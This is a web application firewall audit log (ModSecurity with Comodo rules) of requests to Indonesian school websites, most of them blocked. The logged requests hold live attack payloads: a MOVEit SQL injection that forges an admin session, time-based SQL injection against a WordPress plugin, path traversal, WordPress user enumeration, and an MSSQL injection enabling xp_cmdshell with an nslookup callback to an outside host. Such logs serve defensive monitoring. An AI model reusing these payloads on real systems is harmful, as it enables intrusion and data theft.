Connection: close Content-Type: text/html; charset=iso-8859-1 --c9ed6912-E-- --c9ed6912-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".dll"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748365433396777 2527 (- - -) Stopwatch2: 1748365433396777 2527; combined=1352, p1=357, p2=967, p3=0, p4=0, p5=27, sr=63, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c9ed6912-Z-- --9b09d44f-A-- [28/May/2025:00:03:58 +0700] aDXwft6cNBpj1JOkpQlnJwAAAFU 103.236.140.4 50590 103.236.140.4 8181 --9b09d44f-B-- POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 0 User-Agent: python-requests/2.26.0 Accept: */* Ax-silock-transaction: folder_add_by_path X-siLock-SessVar0: MyPkgID: 0 X-siLock-SessVar1: MyPkgSelfProvisionedRecips: SQL Injection'); INSERT INTO activesessions (SessionID) values ('2xdnTC3Nxx4RVav86ifkRYMLZwI');UPDATE activesessions SET Username=(select Username from users order by permission desc limit 1) WHERE SessionID='2xdnTC3Nxx4RVav86ifkRYMLZwI';UPDATE activesessions SET LoginName='test@test.com' WHERE SessionID='2xdnTC3Nxx4RVav86ifkRYMLZwI';UPDATE activesessions SET RealName='test@test.com' WHERE SessionID='2xdnTC3Nxx4RVav86ifkRYMLZwI';UPDATE activesessions SET 
InstId='1234' WHERE SessionID='2xdnTC3Nxx4RVav86ifkRYMLZwI';UPDATE activesessions SET IpAddress='206.82.6.62' WHERE SessionID='2xdnTC3Nxx4RVav86ifkRYMLZwI';UPDATE activesessions SET LastTouch='2099-06-10 09:30:00' WHERE SessionID='2xdnTC3Nxx4RVav86ifkRYMLZwI';UPDATE activesessions SET DMZInterface='10' WHERE SessionID='2xdnTC3Nxx4RVav86ifkRYMLZwI';UPDATE activesessions SET Timeout='60' WHERE SessionID='2xdnTC3Nxx4RVav86ifkRYMLZwI';UPDATE activesessions SET ResilNode='10' WHERE SessionID='2xdnTC3Nxx4RVav86ifkRYMLZwI';UPDATE activesessions SET AcctReady='1' WHERE SessionID='2xdnTC3Nxx4RVav86ifkRYMLZwI'; -- asdf X-siLock-Transaction: session_setvars X-Forwarded-For: 206.82.6.62 Cookie: siLockLongTermInstID=0; SenayanMember=if0f3gcrssvs5dtsfnsd36gdkp X-Varnish: 168684582 --9b09d44f-C-- --9b09d44f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9b09d44f-E-- --9b09d44f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".dll"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748365438400924 3396 (- - -) Stopwatch2: 1748365438400924 3396; combined=1670, p1=497, p2=1143, p3=0, p4=0, p5=30, sr=78, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9b09d44f-Z-- --add66201-A-- [28/May/2025:00:22:25 +0700] aDX00VuSH_Spa4YU2Zm_FAAAANU 103.236.140.4 51128 103.236.140.4 8181 --add66201-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 14.102.43.106 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.102.43.106 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --add66201-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --add66201-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748366545671265 3240 (- - -) Stopwatch2: 1748366545671265 3240; combined=1438, p1=488, p2=919, p3=0, p4=0, p5=31, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --add66201-Z-- --ba189432-A-- [28/May/2025:00:24:31 +0700] aDX1T96cNBpj1JOkpQlnUwAAAEE 103.236.140.4 51134 103.236.140.4 8181 --ba189432-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 109.205.46.4 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 109.205.46.4 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ba189432-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ba189432-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748366671937891 2893 (- - -) Stopwatch2: 1748366671937891 2893; combined=1325, p1=452, p2=844, p3=0, p4=0, p5=29, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ba189432-Z-- --441cd516-A-- [28/May/2025:00:46:57 +0700] aDX6kRLFq2VRfSzm6b8oPwAAAIQ 103.236.140.4 51546 103.236.140.4 8181 --441cd516-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 185.14.249.230 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.14.249.230 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --441cd516-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --441cd516-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748368017226804 2358 (- - -) Stopwatch2: 1748368017226804 2358; combined=1136, p1=357, p2=749, p3=0, p4=0, p5=29, sr=69, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --441cd516-Z-- --eba11e51-A-- [28/May/2025:00:48:23 +0700] aDX65xLFq2VRfSzm6b8oQgAAAI8 103.236.140.4 51554 103.236.140.4 8181 --eba11e51-B-- POST /wp-content/plugins/wp-automatic/inc/csv.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 84 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62, 103.236.140.4 Cookie: X-Varnish: 168684773 --eba11e51-C-- q=SELECT IF(1=1,sleep(15),sleep(0));&auth=%00&integ=512f993fd8e9d08f42e736f28675ed6f --eba11e51-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eba11e51-H-- Message: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:auth outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:auth=\x00"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748368103619079 2798 (- - -) Stopwatch2: 1748368103619079 2798; combined=1519, p1=359, p2=1132, p3=0, p4=0, p5=28, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eba11e51-Z-- --81ab7475-A-- [28/May/2025:00:48:24 +0700] aDX66N6cNBpj1JOkpQlnbQAAAEE 103.236.140.4 51560 103.236.140.4 8181 --81ab7475-B-- GET /cslu/v1/var/logs/customer-cslu-lib-log.log HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/118.0 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 159947250 --81ab7475-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --81ab7475-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748368104410915 14730 (- - -) Stopwatch2: 1748368104410915 14730; combined=26155, p1=385, p2=419, p3=0, p4=0, p5=12689, sr=67, sw=0, l=0, gc=12662 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --81ab7475-Z-- --80134e79-A-- [28/May/2025:01:03:10 +0700] aDX-Xt6cNBpj1JOkpQlpMwAAAFg 103.236.140.4 55548 103.236.140.4 8181 --80134e79-B-- POST /userentry?accountId=/../../../tomcat/webapps/4IQWb/&symbolName=test&base64UserName=YWRtaW4= HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 124 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 160765150 --80134e79-C-- xœ ðffábœŠ¼ð"AQN „…dœÃ\u ŒŒuMÌLÌôJ*JBC8˜Û§žcóK-­àf`dùÊÈÀÀ2¨:>Ä58„+À›‘IŽ—±`q &†-Pm–°B,A³ À›• ¢—‘!H‡‚M ?Ë --80134e79-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --80134e79-E-- --80134e79-H-- Message: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS_NAMES:x\x9c\v\xf0ff\xe1b\x00\x81\x9c\x8a\xbc\xf0"AQ\x0fN \x1b\x84\x85\x18d\x18\x9c\xc3\\u\x8d\x0c\x8c\x8cuM\xcc\x8dL\xcc\xf4J*JBC8\x19\x98\x1f\xdb\x05\xa7\x9ec\xf3K-\xad\xe0f`d\xf9\xca\xc8\xc0\xc0\x022\x01\xa8:>\xc458\x84 \xc0\x9b\x91I\x8e\x19\x97\xb1\x12`q\xa0 outside range: 1-255. 
[file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS_NAMES:x\x5cx9c\x5cv\x5cxf0ff\x5cxe1b\x5cx00\x5cx81\x5cx9c\x5cx8a\x5cxbc\x5cxf0\x22AQ\x5cx0fN \x5cx1b\x5cx84\x5cx85\x5cx18d\x5cx18\x5cx9c\x5cxc3\x5c\x5cu\x5cx8d\x5cx0c\x5cx8c\x5cx8cuM\x5cxcc\x5cx8dL\x5cxcc\x5cxf4J*JBC8\x5cx19\x5cx98\x5cx1f\x5cxdb\x5cx05\x5cxa7\x5cx9ec\x5cxf3K-\x5cxad\x5cxe0f`d\x5cxf9\x5cxca\x5cxc8\x5cxc0\x5cxc0\x5cx022\x5cx01\x5cxa8:>\x5cxc458\x5cx84 \x5cxc0\x5cx9b\x5cx91I\x5cx8e\x5cx19\x5cx97\x5cxb1\x5cx12`q\x5cxa0=x\x9c\x0b\xf0ff\xe1b\x00\x81\x9c Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748368990418262 4395 (- - -) Stopwatch2: 1748368990418262 4395; combined=2526, p1=469, p2=2026, p3=0, p4=0, p5=31, sr=76, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --80134e79-Z-- --b4424471-A-- [28/May/2025:01:04:36 +0700] aDX-tFuSH_Spa4YU2ZnBDgAAAMM 103.236.140.4 55592 103.236.140.4 8181 --b4424471-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 161.49.93.12 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 161.49.93.12 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b4424471-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b4424471-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748369076150504 2792 (- - -) Stopwatch2: 1748369076150504 2792; combined=1222, p1=414, p2=778, p3=0, p4=0, p5=30, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b4424471-Z-- --b8a47b05-A-- [28/May/2025:01:06:48 +0700] aDX_OGTuEZUBy5rh0saWQQAAAAo 103.236.140.4 55634 103.236.140.4 8181 --b8a47b05-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 121.56.215.142 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 121.56.215.142 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b8a47b05-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b8a47b05-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748369208369654 2753 (- - -) Stopwatch2: 1748369208369654 2753; combined=1278, p1=410, p2=839, p3=0, p4=0, p5=29, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b8a47b05-Z-- --a29a0a54-A-- [28/May/2025:01:07:18 +0700] aDX_VmTuEZUBy5rh0saWSgAAAAI 103.236.140.4 55676 103.236.140.4 8181 --a29a0a54-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.144.114.250 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.144.114.250 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a29a0a54-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a29a0a54-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748369238675132 2457 (- - -) Stopwatch2: 1748369238675132 2457; combined=1216, p1=423, p2=763, p3=0, p4=0, p5=30, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a29a0a54-Z-- --c22e4376-A-- [28/May/2025:01:31:54 +0700] aDYFGluSH_Spa4YU2ZnBhgAAAME 103.236.140.4 57100 103.236.140.4 8181 --c22e4376-B-- GET /cslu/v1/var/logs/customer-cslu-lib-log.log HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36 Edge/12.0 PromptMapper/9.0.3.2 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 160590877 --c22e4376-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c22e4376-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748370714070507 1391 (- - -) Stopwatch2: 1748370714070507 1391; combined=543, p1=221, p2=300, p3=0, p4=0, p5=22, sr=49, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c22e4376-Z-- --e0c61840-A-- [28/May/2025:01:31:54 +0700] aDYFGmTuEZUBy5rh0saW5QAAAA0 103.236.140.4 57110 103.236.140.4 8181 --e0c61840-B-- POST /wp-content/plugins/wp-automatic/inc/csv.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 84 User-Agent: Mozilla/5.0 (ZZ; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 159947558 --e0c61840-C-- q=SELECT IF(1=1,sleep(15),sleep(0));&auth=%00&integ=512f993fd8e9d08f42e736f28675ed6f --e0c61840-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e0c61840-H-- Message: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:auth outside range: 1-255. 
[file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:auth=\x00"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748370714089119 1760 (- - -) Stopwatch2: 1748370714089119 1760; combined=924, p1=282, p2=622, p3=0, p4=0, p5=19, sr=90, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e0c61840-Z-- --7118ec01-A-- [28/May/2025:01:31:58 +0700] aDYFHmTuEZUBy5rh0saW6wAAABc 103.236.140.4 57118 103.236.140.4 8181 --7118ec01-B-- POST /WSStatusEvents/EventHandler.asmx HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 775 User-Agent: Mozilla/5.0 (Windows NT 11.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/106.0 Safari/537.36 Content-Type: application/soap+xml X-Forwarded-For: 206.82.6.62, 103.236.140.4 Cookie: X-Varnish: 166167910 --7118ec01-C-- string GoodApp=1|md5='; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'nslookup d0qa44pgpeoi1bmoheagj15sqxao11pfu.oast.live'-- --7118ec01-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --7118ec01-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=application/soap+xml"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748370718862738 4514 (- - -) Stopwatch2: 1748370718862738 4514; combined=3247, p1=562, p2=2567, p3=39, p4=45, p5=33, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7118ec01-Z-- --11228611-A-- [28/May/2025:01:52:26 +0700] aDYJ6hLFq2VRfSzm6b8rvQAAAJA 103.236.140.4 59798 103.236.140.4 8181 --11228611-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 177.136.112.178 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 177.136.112.178 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --11228611-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --11228611-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
